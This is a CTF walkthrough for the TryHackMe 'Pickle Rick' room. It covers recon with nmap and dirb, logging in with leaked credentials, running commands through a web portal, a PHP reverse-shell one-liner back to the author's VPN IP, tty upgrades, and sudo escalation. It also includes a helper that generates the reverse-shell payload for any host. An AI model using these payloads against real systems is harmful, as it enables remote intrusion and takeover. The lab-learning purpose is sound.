Tryhackme.com – Pickle Rick challenge notes

URL: https://tryhackme.com/room/picklerick

If you're going to be doing a lot of CTF challenges then it might be worth adding a mkcd function to your .zshrc or .bashrc. It takes three commands to set up (the snippet itself is not reproduced in these notes):

The first command appends the function to your .zshrc (this works just the same with .bashrc).

The second command sources (re-reads) your .zshrc so the function is defined in the current shell; a freshly opened terminal would pick it up anyway.

The third command just checks that the function is now defined, as a sanity check.

Now, to create a thm directory with the challenge name and cd into it in one go, just run:
$ mkcd thm/picklerick
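The helper itself, as an added example. The post's own snippet is not shown, so this definition is an assumption about what it contained and is not the author's code; the three install steps are repeated in the comments.

```shell
# mkcd: create a directory (and any missing parents) and cd into it in one
# step. Assumed definition, added here because the original post does not
# reproduce its version of the function.
mkcd() {
  if [ -z "$1" ]; then
    echo "usage: mkcd <dir>" >&2
    return 1
  fi
  # "&&" means we only cd if mkdir succeeded; "--" keeps odd names safe.
  mkdir -p -- "$1" && cd -- "$1"
}

# To install it permanently (the three commands the notes refer to):
#   1. append the function above to ~/.zshrc (or ~/.bashrc)
#   2. source ~/.zshrc     # reload so the current shell picks it up
#   3. type mkcd           # sanity-check that it is now defined
```

Re-running it on a directory that already exists is harmless because of `mkdir -p`, so the same command works whether you are starting a room or coming back to it.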

If you'd rather not touch your bash or zsh config, just create a directory to put all of the notes in (the && means the cd only runs if the mkdir succeeded):

$ mkdir -p thm/picklerick && cd thm/picklerick

Now start the machine in THM so it gives you the target IP. I then store it in a shell variable so I don't have to keep remembering it when running commands against the box:

$ export IP=<the_ip_thm_assigns_the_machine>

Let's start with an nmap scan and see what we get:

$ sudo nmap -sC -sV -oN scan $IP

The scan output is not reproduced here, but it shows port 80 open running Apache, so I thought I would see whether any of the HTTP response headers might help.

Let's have a gander with dirb, looking for the following extensions: php, sh, txt, cgi, html, js, css and py:

$ dirb http://$IP -X .php,.sh,.txt,.cgi,.html,.js,.css,.py

I can see straight away that there is an index.html, so let's have a look:

$ wget -qO- http://$IP/index.html

I found something interesting: a username. So I take a note of it and look at what robots.txt shows me:

$ wget -qO- http://$IP/robots.txt

Interesting, so that string goes into my creds.txt file as well.

So now I will try and log in with the details I have found (opening the login page in Firefox as the kali user):

$ sudo -u kali firefox http://$IP/login.php

OK, so those details worked and we get a page that shows the following tabs, but clicking through them you cannot do much:

Commands

Let's try a command and see what happens. I thought the list command would show something:

Trying commands

Now we have a list of files to look at, and one of them looks like it could be a flag:

Looks like I have the first flag, so that goes into the creds.txt file as well:

Let's see what happens if we try php or python commands in the portal:

Shows the PHP version
Prints "test" with python3

OK, so both work, which means we can try a reverse shell. First we need our own (VPN) IP so the target has something to connect back to with netcat:

Now I will run netcat listening on a port of my choosing, 6666:

$ nc -lvnp 6666

Then, because we know PHP works, let's try a reverse shell by pasting the following into the portal box and pressing execute (10.9.156.86 is my VPN IP; the $ signs are escaped so the shell the portal runs the command through does not expand them before PHP sees the code):

php -r "\$sock=fsockopen('10.9.156.86',6666);\$proc=proc_open('/bin/sh -i',array(0=>\$sock, 1=>\$sock, 2=>\$sock),\$pipes);"

Now we have a reverse shell we can start looking around for the other flags. But the shell complains about not having a tty.

You can fix that with either of the following:

/usr/bin/script -qc /bin/bash /dev/null

or

python3 -c 'import pty; pty.spawn("/bin/bash")'
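As an added example that is not part of the original notes, here is a small shell helper that builds the same PHP one-liner for a given attacker IP and port, so the quoting (straight quotes, escaped $) is done once and correctly rather than retyped per box. The listener and tty-upgrade steps from above are repeated in the comments; the host and port values in the comments are placeholders.

```shell
# php_revshell LHOST LPORT
# Prints the PHP reverse-shell one-liner used in these notes with the given
# attacker address filled in. Added example; the template matches the command
# pasted into the portal above, it is not code from the room or the post.
php_revshell() {
  # LHOST must be a dotted IPv4 address (your tun0 address on the THM VPN).
  case $1 in
    ''|*[!0-9.]*) echo "php_revshell: LHOST must be a dotted IPv4 address" >&2; return 1 ;;
  esac
  # LPORT must be a number in 1..65535.
  case $2 in
    ''|*[!0-9]*) echo "php_revshell: LPORT must be numeric" >&2; return 1 ;;
  esac
  if [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
    echo "php_revshell: LPORT out of range" >&2
    return 1
  fi
  # The heredoc delimiter is quoted, so "\$" reaches the output literally.
  # That backslash matters: the portal hands the string to a shell inside
  # double quotes, and an unescaped $sock would be expanded (to nothing)
  # before PHP ever sees it.
  sed "s/LHOST/$1/; s/LPORT/$2/" <<'EOF'
php -r "\$sock=fsockopen('LHOST',LPORT);\$proc=proc_open('/bin/sh -i',array(0=>\$sock,1=>\$sock,2=>\$sock),\$pipes);"
EOF
}

# Workflow, as in the notes (placeholder values):
#   1. on your machine:  nc -lvnp 6666
#   2. php_revshell 10.9.156.86 6666   -> paste the output into the portal
#   3. once the shell lands, upgrade it:
#        /usr/bin/script -qc /bin/bash /dev/null
#      or
#        python3 -c 'import pty; pty.spawn("/bin/bash")'
```

The checks on the arguments are there because a typo in the IP or port fails silently on the target side: the PHP process just exits and the only symptom is a listener that never gets a connection.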

That let me switch users from www-data to root, and looking at the files there are some interesting names.

We can see that there is a home directory for rick so let’s take a look in there.

Looks like we have all of the flags that are left now.

Looking back at this at the end, I realise the reverse shell wasn't even needed: the web server user can run sudo without a password, so I could have used $ sudo -i or $ sudo bash from the portal to escalate privileges. Since the portal is not interactive, prefixing the individual command with sudo (for example sudo followed by the command that reads the file) is the practical form.
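An added check, not part of the original notes, that is worth running from the portal before going to the trouble of a reverse shell: ask sudo what the current user may run. The `sudo -l` output below is constructed for the example rather than captured from the room, and the entry it shows is an assumption; the parsing works on the standard sudo -l layout.

```shell
# Constructed sample of "sudo -l" output for a web server user. This is an
# assumed example, not the output from the Pickle Rick box.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: ALL'

# nopasswd_entries TEXT
# Print the command specs that can be run without a password, one per line.
# Lines look like "    (ALL) NOPASSWD: ALL" or "    (root) NOPASSWD: /usr/bin/vim";
# everything up to and including "NOPASSWD:" is stripped, leaving the spec.
nopasswd_entries() {
  printf '%s\n' "$1" | sed -n 's/^[[:space:]]*(.*)[[:space:]]*NOPASSWD:[[:space:]]*//p'
}

# can_sudo_all TEXT
# Succeed (exit 0) only if an unrestricted "NOPASSWD: ALL" entry is present,
# i.e. any command can be run as root with no password at all.
can_sudo_all() {
  nopasswd_entries "$1" | grep -qx 'ALL'
}

# Usage from a non-interactive web portal (added note): use "sudo -n -l" so
# sudo fails immediately instead of hanging on a password prompt you cannot
# answer, then feed the output to the functions above:
#   out=$(sudo -n -l 2>&1); if can_sudo_all "$out"; then echo 'root via sudo'; fi
```

A restricted entry such as `(root) NOPASSWD: /usr/bin/vim` is still worth noting even when `can_sudo_all` fails: a single allowed binary is often enough to read a file or spawn a shell, but that is a separate step from the blanket rule this room relies on.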

EDIT: Trying to get the second flag now gives you this page 🙂
